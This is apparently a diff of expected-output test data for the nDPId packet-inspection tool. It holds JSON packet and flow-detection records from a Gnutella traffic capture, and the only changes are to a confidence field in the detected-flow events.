00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":101837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101837,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAsIAAIAR5ekKAAIP1eVv4HAJEwwAWTJ5PKcxAijtzcGdOPipHVZyGEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":106200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106200,"pkt":"UlQAEjUCCAAn5uVZCABFAABtgo8AAIAR6zkKAAIPwSX\/gnAJ8LAAWcdbqxExAsF5aprYo0LmkOznoEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":106200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106200,"pkt":"UlQAEjUCCAAn5uVZCABFAABt7XkAAIAREsQKAAIPUD3d9nAJd3EAWRpRkUIxAvIfqgvF6WkSbnxZFUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeEAAIARAL0KAAIPQh7dtXAJLuwAWUvy0dkxAnflHs8XZg0HoKrR0EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP0AAIARBkIKAAIPLVh12nAJGv0AWUikdrExAmyl2\/D4Flpgn2PiMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/wAAIAR2kwKAAIPucvaXHAJ3oIAWXW3EqAxAn\/MqZ\/PxBBVRWBQQEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":111377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111377,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUIAAIARBHoKAAIPSIx4KXAJunsAWR8sGNIxAigwQqvDAye6DaSDvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":111378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111378,"pkt":"UlQAEjUCCAAn5uVZCABFAABt\/AEAAIARkCAKAAIPWHhJ13AJX\/IAWXHaSscxAtAehZxkzy2fwIIymUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":111410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111410,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcUAAIARHzgKAAIPYPacfnAJxHkAWT0ZQMwxAkCcLpcbJhOCUhZqY0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
@@ -1161,16 +1161,16 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} 
00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":115369,"flow_last_seen":115369,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":115369,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":115369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":115369,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ticAAIARadEKAAIPDsj\/5XAJkMIAJDeaLGAxAs8iaaH\/Df9W3JltAwABAAUAAADDglFLQA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":115702,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":115702,"pkt":"CAAn5uVZUlQAEjUCCABFAABKBegAAEARWf8OyP\/lCgACD5DCcAkANl\/hLGAxAs8iaaH\/Df9W3JltAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} 
00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":116628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116628,"pkt":"UlQAEjUCCAAn5uVZCABFAABtIxgAAIARvpEKAAIPUAf8wHAJGugAWSw6p+kxAjYZLonacBdkV9ywAUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":116679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":116679,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBfMAAEARGTFQB\/zACgACDxrocAkC3\/Iip+kxAjYZLonacBdkV9ywAUQAAMACAAAGR1RLRwAAZxkkdSip9v6JKj37UBrDicBfjMAEUAf8wBroAQAAAASysOQuFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cA
ABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtUw=="} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":116776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116776,"pkt":"UlQAEjUCCAAn5uVZCABFAABte4sAAIAR7VYKAAIPLR+YcHAJaOMAWSdx+0cxAtvllYjgRR1H\/sPbPUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":116859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116859,"pkt":"UlQAEjUCCAAn5uVZCABFAABt9MUAAIARu2AKAAIPUkAsC3AJBUgAWR\/CHmUxAhaifRIPh7YCtQDKL0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
@@ -1182,58 +1182,58 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":123877,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123877,"pkt":"UlQAEjUCCAAn5uVZCABFAABtptcAAIAR2PwKAAIPpIQKGXAJ2AYAWdpE9ZMxAnuYArMNMRKsJogRPUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABtUhMAAIARg2YKAAIPGHRAhHAJyBsAWUp2fKAxAtxaLOqCcitFlOv4V0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 